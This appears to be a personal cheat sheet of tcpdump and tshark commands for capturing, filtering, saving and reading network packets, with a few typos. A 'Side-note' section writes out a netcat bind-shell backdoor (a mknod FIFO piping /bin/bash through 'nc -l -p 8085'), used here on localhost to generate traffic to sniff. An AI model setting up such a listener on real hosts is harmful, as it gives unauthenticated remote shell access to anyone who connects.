# tcpdump & wireshark

## tcpdump

* command-line sniffer
* useful in case Wireshark is not available

You will  need to be # root to run it

### Identify your interfaces

    tcpdump -D // list all interfaces

### Capture from a specific interface

    tcpdummp -i eth0

### Show the data / packets

    tcpdump -i eth0 -X

### Show data on specific port

    tcpdump -i wlan0 port 80

### Write to a packet caputure file

    tcpdump -i lo -X prot 80 -w cap.pcap // write
    tcpdump -r cap.pcap // read the captured file

### Specify the host

    tcpdump host 8.8.8.8 // google dns

### NOT prot
Sometimes when your'e running tcpdump in aws ec2 or other servers you can use the following command to exclude your own ssh traffic

    tcpdump not port 22 // filters out port 22 traffic

### Capture all packets regardless of their size and the whole packet

    tcpdump -s0 -i wlan0 -w cap.pcap


> Side-note

Creating a back-door

    mknod backpipe p 
    // this creates a FIFO device file backpipe is the name 
    // p tells to create FIFO device file


    /bin/bash 0<backpipe |nc -l -p 8085 1>backpipe // back-door listening on 8085

    nc 127.0.0.1 8085 // and type your message

In a separate terminal capture packets using 

    tcpdump -i lo -X port 8085

## Wireshark

### Capture in any interface

    tshark -i any icmp // use ping 127.1 to create icmp traffic

### Write capture to files

    tshark -i any -w icmp.pcap 

### Capture only 10 packets

    tshark -i any -c 10 icmp // use -c NUMBER to specify the no. of packets you want to be captured

### Reading captured files

    tshark -r icmp.pcap  // add -c 5 read only 5 packets

### Show detailed information about a packet

    tshark -r icmp.pcap -V -c 1 // -V shows packet details

### Using capinfos to get the summary about captured files

    capinfos web.pcap